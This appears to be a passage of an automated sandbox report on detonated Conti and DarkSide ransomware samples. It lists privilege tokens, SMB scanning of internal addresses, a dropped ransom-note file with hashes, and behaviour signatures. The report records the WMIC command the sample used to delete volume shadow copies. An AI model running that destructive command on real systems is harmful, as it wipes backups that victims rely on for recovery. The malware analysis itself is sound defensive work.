N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{A958BAE6-B132-4B07-8587-5D3813184B5D}'" delete

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.44:445 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.42:445 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.51:445 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.49:445 tcp
N/A 10.127.0.39:445 tcp
N/A 10.127.0.45:445 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.40:445 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.116:445 tcp
N/A 10.127.0.37:445 tcp
N/A 10.127.0.56:445 tcp
N/A 10.127.0.60:445 tcp
N/A 10.127.0.41:445 tcp
N/A 10.127.0.53:445 tcp
N/A 10.127.0.54:445 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.62:445 tcp
N/A 10.127.0.114:445 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.63:445 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.61:445 tcp
N/A 10.127.0.64:445 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.38:445 tcp
N/A 10.127.0.58:445 tcp
N/A 10.127.0.47:445 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.46:445 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.251:445 tcp
N/A 10.127.0.252:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.68:445 tcp
N/A 10.127.0.55:445 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.50:445 tcp
N/A 10.127.0.232:445 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.52:445 tcp
N/A 10.127.0.110:445 tcp
N/A 10.127.0.109:445 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.108:445 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.48:445 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.43:445 tcp
N/A 10.127.0.57:445 tcp
N/A 10.127.0.93:445 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.67:445 tcp
N/A 10.127.0.107:445 tcp
N/A 10.127.0.112:445 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.106:445 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.69:445 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.82:445 tcp
N/A 10.127.0.87:445 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.65:445 tcp
N/A 10.127.0.113:445 tcp
N/A 10.127.0.59:445 tcp
N/A 10.127.0.127:445 tcp
N/A 10.127.0.84:445 tcp
N/A 10.127.0.96:445 tcp
N/A 10.127.0.100:445 tcp
N/A 10.127.0.88:445 tcp
N/A 10.127.0.111:445 tcp
N/A 10.127.0.115:445 tcp
N/A 10.127.0.98:445 tcp
N/A 10.127.0.79:445 tcp
N/A 10.127.0.81:445 tcp
N/A 10.127.0.85:445 tcp
N/A 10.127.0.126:445 tcp
N/A 10.127.0.102:445 tcp
N/A 10.127.0.77:445 tcp
N/A 10.127.0.75:445 tcp
N/A 10.127.0.91:445 tcp
N/A 10.127.0.94:445 tcp
N/A 10.127.0.101:445 tcp
N/A 10.127.0.73:445 tcp
N/A 10.127.0.78:445 tcp
N/A 10.127.0.70:445 tcp
N/A 10.127.0.95:445 tcp
N/A 10.127.0.74:445 tcp
N/A 10.127.0.71:445 tcp
N/A 10.127.0.86:445 tcp
N/A 10.127.0.76:445 tcp
N/A 10.127.0.89:445 tcp
N/A 10.127.0.92:445 tcp
N/A 10.127.0.99:445 tcp
N/A 10.127.0.66:445 tcp
N/A 10.127.0.90:445 tcp
N/A 10.127.0.83:445 tcp
N/A 10.127.0.97:445 tcp
N/A 10.127.0.72:445 tcp
N/A 10.127.0.80:445 tcp
N/A 10.127.0.154:445 tcp
N/A 10.127.0.167:445 tcp
N/A 10.127.0.179:445 tcp
N/A 10.127.0.152:445 tcp
N/A 10.127.0.158:445 tcp
N/A 10.127.0.153:445 tcp
N/A 10.127.0.176:445 tcp
N/A 10.127.0.178:445 tcp
N/A 10.127.0.175:445 tcp
N/A 10.127.0.155:445 tcp
N/A 10.127.0.173:445 tcp
N/A 10.127.0.128:445 tcp
N/A 10.127.0.161:445 tcp
N/A 10.127.0.180:445 tcp
N/A 10.127.0.136:445 tcp
N/A 10.127.0.139:445 tcp
N/A 10.127.0.131:445 tcp
N/A 10.127.0.135:445 tcp
N/A 10.127.0.105:445 tcp
N/A 10.127.0.140:445 tcp
N/A 10.127.0.120:445 tcp
N/A 10.127.0.104:445 tcp
N/A 10.127.0.138:445 tcp
N/A 10.127.0.157:445 tcp
N/A 10.127.0.172:445 tcp
N/A 10.127.0.170:445 tcp
N/A 10.127.0.159:445 tcp
N/A 10.127.0.160:445 tcp
N/A 10.127.0.162:445 tcp
N/A 10.127.0.156:445 tcp
N/A 10.127.0.169:445 tcp
N/A 10.127.0.122:445 tcp
N/A 10.127.0.147:445 tcp
N/A 10.127.0.164:445 tcp
N/A 10.127.0.119:445 tcp
N/A 10.127.0.123:445 tcp
N/A 10.127.0.146:445 tcp
N/A 10.127.0.165:445 tcp
N/A 10.127.0.141:445 tcp
N/A 10.127.0.145:445 tcp
N/A 10.127.0.148:445 tcp
N/A 10.127.0.174:445 tcp
N/A 10.127.0.132:445 tcp
N/A 10.127.0.125:445 tcp
N/A 10.127.0.117:445 tcp
N/A 10.127.0.142:445 tcp
N/A 10.127.0.103:445 tcp
N/A 10.127.0.137:445 tcp
N/A 10.127.0.144:445 tcp
N/A 10.127.0.133:445 tcp
N/A 10.127.0.151:445 tcp
N/A 10.127.0.143:445 tcp
N/A 10.127.0.129:445 tcp
N/A 10.127.0.171:445 tcp
N/A 10.127.0.121:445 tcp
N/A 10.127.0.149:445 tcp
N/A 10.127.0.163:445 tcp
N/A 10.127.0.130:445 tcp
N/A 10.127.0.166:445 tcp
N/A 10.127.0.168:445 tcp
N/A 10.127.0.177:445 tcp
N/A 10.127.0.124:445 tcp
N/A 10.127.0.150:445 tcp
N/A 10.127.0.118:445 tcp
N/A 10.127.0.134:445 tcp
N/A 10.127.0.220:445 tcp
N/A 10.127.0.187:445 tcp
N/A 10.127.0.230:445 tcp
N/A 10.127.0.206:445 tcp
N/A 10.127.0.210:445 tcp
N/A 10.127.0.212:445 tcp
N/A 10.127.0.233:445 tcp
N/A 10.127.0.192:445 tcp
N/A 10.127.0.213:445 tcp
N/A 10.127.0.181:445 tcp
N/A 10.127.0.188:445 tcp
N/A 10.127.0.200:445 tcp
N/A 10.127.0.238:445 tcp
N/A 10.127.0.243:445 tcp
N/A 10.127.0.222:445 tcp
N/A 10.127.0.209:445 tcp
N/A 10.127.0.186:445 tcp
N/A 10.127.0.242:445 tcp
N/A 10.127.0.248:445 tcp
N/A 10.127.0.198:445 tcp
N/A 10.127.0.240:445 tcp
N/A 10.127.0.201:445 tcp
N/A 10.127.0.245:445 tcp
N/A 10.127.0.217:445 tcp
N/A 10.127.0.241:445 tcp
N/A 10.127.0.182:445 tcp
N/A 10.127.0.185:445 tcp
N/A 10.127.0.196:445 tcp
N/A 10.127.0.246:445 tcp
N/A 10.127.0.211:445 tcp
N/A 10.127.0.215:445 tcp
N/A 10.127.0.227:445 tcp
N/A 10.127.0.204:445 tcp
N/A 10.127.0.216:445 tcp
N/A 10.127.0.223:445 tcp
N/A 10.127.0.189:445 tcp
N/A 10.127.0.224:445 tcp
N/A 10.127.0.231:445 tcp
N/A 10.127.0.195:445 tcp
N/A 10.127.0.203:445 tcp
N/A 10.127.0.208:445 tcp
N/A 10.127.0.207:445 tcp
N/A 10.127.0.218:445 tcp
N/A 10.127.0.190:445 tcp
N/A 10.127.0.219:445 tcp
N/A 10.127.0.228:445 tcp
N/A 10.127.0.184:445 tcp
N/A 10.127.0.214:445 tcp
N/A 10.127.0.191:445 tcp
N/A 10.127.0.199:445 tcp
N/A 10.127.0.183:445 tcp
N/A 10.127.0.225:445 tcp
N/A 10.127.0.202:445 tcp
N/A 10.127.0.205:445 tcp
N/A 10.127.0.234:445 tcp
N/A 10.127.0.237:445 tcp
N/A 10.127.0.229:445 tcp
N/A 10.127.0.226:445 tcp
N/A 10.127.0.239:445 tcp
N/A 10.127.0.236:445 tcp
N/A 10.127.0.193:445 tcp
N/A 10.127.0.197:445 tcp
N/A 10.127.0.194:445 tcp
N/A 10.127.0.221:445 tcp
N/A 10.127.0.235:445 tcp
N/A 10.127.0.244:445 tcp
N/A 10.127.0.250:445 tcp
N/A 10.127.0.249:445 tcp
N/A 10.127.0.254:445 tcp
N/A 10.127.0.247:445 tcp
N/A 10.127.0.253:445 tcp
N/A 10.127.255.49:445 tcp
N/A 10.127.255.5:445 tcp
N/A 10.127.255.25:445 tcp
N/A 10.127.255.33:445 tcp
N/A 10.127.255.51:445 tcp
N/A 10.127.255.54:445 tcp
N/A 10.127.255.23:445 tcp
N/A 10.127.255.50:445 tcp
N/A 10.127.255.14:445 tcp
N/A 10.127.255.1:445 tcp
N/A 10.127.255.18:445 tcp
N/A 10.127.255.7:445 tcp
N/A 10.127.255.8:445 tcp
N/A 10.127.255.16:445 tcp
N/A 10.127.255.37:445 tcp
N/A 10.127.255.190:445 tcp
N/A 10.127.255.46:445 tcp
N/A 10.127.255.6:445 tcp
N/A 10.127.255.38:445 tcp
N/A 10.127.255.39:445 tcp
N/A 10.127.255.42:445 tcp
N/A 10.127.255.17:445 tcp
N/A 10.127.255.29:445 tcp
N/A 10.127.255.43:445 tcp
N/A 10.127.255.60:445 tcp
N/A 10.127.255.47:445 tcp
N/A 10.127.255.31:445 tcp
N/A 10.127.255.61:445 tcp
N/A 10.127.255.32:445 tcp
N/A 10.127.255.44:445 tcp
N/A 10.127.255.26:445 tcp
N/A 10.127.255.40:445 tcp
N/A 10.127.255.56:445 tcp
N/A 10.127.255.15:445 tcp
N/A 10.127.255.12:445 tcp
N/A 10.127.255.24:445 tcp
N/A 10.127.255.41:445 tcp
N/A 10.127.255.28:445 tcp
N/A 10.127.255.36:445 tcp
N/A 10.127.255.3:445 tcp
N/A 10.127.255.30:445 tcp
N/A 10.127.255.9:445 tcp
N/A 10.127.255.2:445 tcp
N/A 10.127.255.45:445 tcp
N/A 10.127.255.53:445 tcp
N/A 10.127.255.57:445 tcp
N/A 10.127.255.4:445 tcp
N/A 10.127.255.11:445 tcp
N/A 10.127.255.21:445 tcp
N/A 10.127.255.22:445 tcp
N/A 10.127.255.27:445 tcp
N/A 10.127.255.55:445 tcp
N/A 10.127.255.0:445 tcp
N/A 10.127.255.10:445 tcp
N/A 10.127.255.58:445 tcp
N/A 10.127.255.19:445 tcp
N/A 10.127.255.62:445 tcp
N/A 10.127.255.20:445 tcp
N/A 10.127.255.63:445 tcp
N/A 10.127.255.35:445 tcp
N/A 10.127.255.34:445 tcp
N/A 10.127.255.52:445 tcp
N/A 10.127.255.59:445 tcp
N/A 10.127.255.13:445 tcp
N/A 10.127.255.64:445 tcp
N/A 10.127.255.48:445 tcp
N/A 10.127.255.80:445 tcp
N/A 10.127.255.116:445 tcp
N/A 10.127.255.75:445 tcp
N/A 10.127.255.91:445 tcp
N/A 10.127.255.103:445 tcp
N/A 10.127.255.123:445 tcp
N/A 10.127.255.82:445 tcp
N/A 10.127.255.94:445 tcp
N/A 10.127.255.129:445 tcp
N/A 10.127.255.114:445 tcp
N/A 10.127.255.122:445 tcp
N/A 10.127.255.124:445 tcp
N/A 10.127.255.85:445 tcp
N/A 10.127.255.68:445 tcp
N/A 10.127.255.69:445 tcp
N/A 10.127.255.86:445 tcp
N/A 10.127.255.99:445 tcp
N/A 10.127.255.117:445 tcp
N/A 10.127.255.101:445 tcp
N/A 10.127.255.113:445 tcp
N/A 10.127.255.110:445 tcp
N/A 10.127.255.74:445 tcp
N/A 10.127.255.127:445 tcp
N/A 10.127.255.84:445 tcp
N/A 10.127.255.125:445 tcp
N/A 10.127.255.87:445 tcp
N/A 10.127.255.66:445 tcp
N/A 10.127.255.107:445 tcp
N/A 10.127.255.121:445 tcp
N/A 10.127.255.96:445 tcp
N/A 10.127.255.70:445 tcp
N/A 10.127.255.81:445 tcp
N/A 10.127.255.90:445 tcp
N/A 10.127.255.100:445 tcp
N/A 10.127.255.105:445 tcp
N/A 10.127.255.95:445 tcp
N/A 10.127.255.93:445 tcp
N/A 10.127.255.72:445 tcp
N/A 10.127.255.104:445 tcp
N/A 10.127.255.65:445 tcp
N/A 10.127.255.97:445 tcp
N/A 10.127.255.106:445 tcp
N/A 10.127.255.73:445 tcp
N/A 10.127.255.98:445 tcp
N/A 10.127.255.126:445 tcp
N/A 10.127.255.128:445 tcp
N/A 10.127.255.92:445 tcp
N/A 10.127.255.115:445 tcp
N/A 10.127.255.108:445 tcp
N/A 10.127.255.88:445 tcp
N/A 10.127.255.79:445 tcp
N/A 10.127.255.89:445 tcp
N/A 10.127.255.119:445 tcp
N/A 10.127.255.102:445 tcp
N/A 10.127.255.109:445 tcp
N/A 10.127.255.112:445 tcp
N/A 10.127.255.120:445 tcp
N/A 10.127.255.67:445 tcp
N/A 10.127.255.76:445 tcp
N/A 10.127.255.71:445 tcp
N/A 10.127.255.77:445 tcp
N/A 10.127.255.192:445 tcp
N/A 10.127.255.78:445 tcp
N/A 10.127.255.83:445 tcp
N/A 10.127.255.118:445 tcp
N/A 10.127.255.111:445 tcp
N/A 10.127.255.176:445 tcp
N/A 10.127.255.137:445 tcp
N/A 10.127.255.165:445 tcp
N/A 10.127.255.141:445 tcp
N/A 10.127.255.154:445 tcp
N/A 10.127.255.131:445 tcp
N/A 10.127.255.193:445 tcp
N/A 10.127.255.180:445 tcp
N/A 10.127.255.188:445 tcp
N/A 10.127.255.195:445 tcp
N/A 10.127.255.132:445 tcp
N/A 10.127.255.162:445 tcp
N/A 10.127.255.179:445 tcp
N/A 10.127.255.157:445 tcp
N/A 10.127.255.185:445 tcp
N/A 10.127.255.196:445 tcp
N/A 10.127.255.149:445 tcp
N/A 10.127.255.164:445 tcp
N/A 10.127.255.171:445 tcp
N/A 10.127.255.173:445 tcp
N/A 10.127.255.142:445 tcp
N/A 10.127.255.183:445 tcp
N/A 10.127.255.138:445 tcp
N/A 10.127.255.151:445 tcp
N/A 10.127.255.174:445 tcp
N/A 10.127.255.169:445 tcp
N/A 10.127.255.182:445 tcp
N/A 10.127.255.146:445 tcp
N/A 10.127.255.172:445 tcp
N/A 10.127.255.175:445 tcp
N/A 10.127.255.177:445 tcp
N/A 10.127.255.140:445 tcp
N/A 10.127.255.143:445 tcp
N/A 10.127.255.156:445 tcp
N/A 10.127.255.136:445 tcp
N/A 10.127.255.145:445 tcp
N/A 10.127.255.184:445 tcp
N/A 10.127.255.187:445 tcp
N/A 10.127.255.148:445 tcp
N/A 10.127.255.130:445 tcp
N/A 10.127.255.181:445 tcp
N/A 10.127.255.139:445 tcp
N/A 10.127.255.152:445 tcp
N/A 10.127.255.170:445 tcp
N/A 10.127.255.163:445 tcp
N/A 10.127.255.155:445 tcp
N/A 10.127.255.189:445 tcp
N/A 10.127.255.160:445 tcp
N/A 10.127.255.194:445 tcp
N/A 10.127.255.186:445 tcp
N/A 10.127.255.144:445 tcp
N/A 10.127.255.166:445 tcp
N/A 10.127.255.135:445 tcp
N/A 10.127.255.134:445 tcp
N/A 10.127.255.147:445 tcp
N/A 10.127.255.133:445 tcp
N/A 10.127.255.150:445 tcp
N/A 10.127.255.158:445 tcp
N/A 10.127.255.178:445 tcp
N/A 10.127.255.191:445 tcp
N/A 10.127.255.167:445 tcp
N/A 10.127.255.161:445 tcp
N/A 10.127.255.168:445 tcp
N/A 10.127.255.153:445 tcp
N/A 10.127.255.159:445 tcp
N/A 10.127.255.214:445 tcp
N/A 10.127.255.228:445 tcp
N/A 10.127.255.201:445 tcp
N/A 10.127.255.246:445 tcp
N/A 10.127.255.207:445 tcp
N/A 10.127.255.236:445 tcp
N/A 10.127.255.203:445 tcp
N/A 10.127.255.244:445 tcp
N/A 10.127.255.247:445 tcp
N/A 10.127.255.204:445 tcp
N/A 10.127.255.208:445 tcp
N/A 10.127.255.212:445 tcp
N/A 10.127.255.205:445 tcp
N/A 10.127.255.243:445 tcp
N/A 10.127.255.254:445 tcp
N/A 10.127.255.233:445 tcp
N/A 10.127.255.238:445 tcp
N/A 10.127.255.226:445 tcp
N/A 10.127.255.239:445 tcp
N/A 10.127.255.237:445 tcp
N/A 10.127.255.229:445 tcp
N/A 10.127.255.198:445 tcp
N/A 10.127.255.230:445 tcp
N/A 10.127.255.245:445 tcp
N/A 10.127.255.200:445 tcp
N/A 10.127.255.242:445 tcp
N/A 10.127.255.231:445 tcp
N/A 10.127.255.209:445 tcp
N/A 10.127.255.210:445 tcp
N/A 10.127.255.211:445 tcp
N/A 10.127.255.215:445 tcp
N/A 10.127.255.252:445 tcp
N/A 10.127.255.225:445 tcp
N/A 10.127.255.253:445 tcp
N/A 10.127.255.241:445 tcp
N/A 10.127.255.220:445 tcp
N/A 10.127.255.250:445 tcp
N/A 10.127.255.213:445 tcp
N/A 10.127.255.248:445 tcp
N/A 10.127.255.199:445 tcp
N/A 10.127.255.217:445 tcp
N/A 10.127.255.227:445 tcp
N/A 10.127.255.222:445 tcp
N/A 10.127.255.216:445 tcp
N/A 10.127.255.251:445 tcp
N/A 10.127.255.223:445 tcp
N/A 10.127.255.249:445 tcp
N/A 10.127.255.218:445 tcp
N/A 10.127.255.197:445 tcp
N/A 10.127.255.224:445 tcp
N/A 10.127.255.235:445 tcp
N/A 10.127.255.206:445 tcp
N/A 10.127.255.202:445 tcp
N/A 10.127.255.232:445 tcp
N/A 10.127.255.219:445 tcp
N/A 10.127.255.234:445 tcp
N/A 10.127.255.221:445 tcp
N/A 10.127.255.240:445 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

C:\ProgramData\R3ADM3.txt

MD5 e6f001fc98cb51a0429ca5dc95f6a950
SHA1 16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256 acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral22

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1699s

Max time network

1164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (164) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
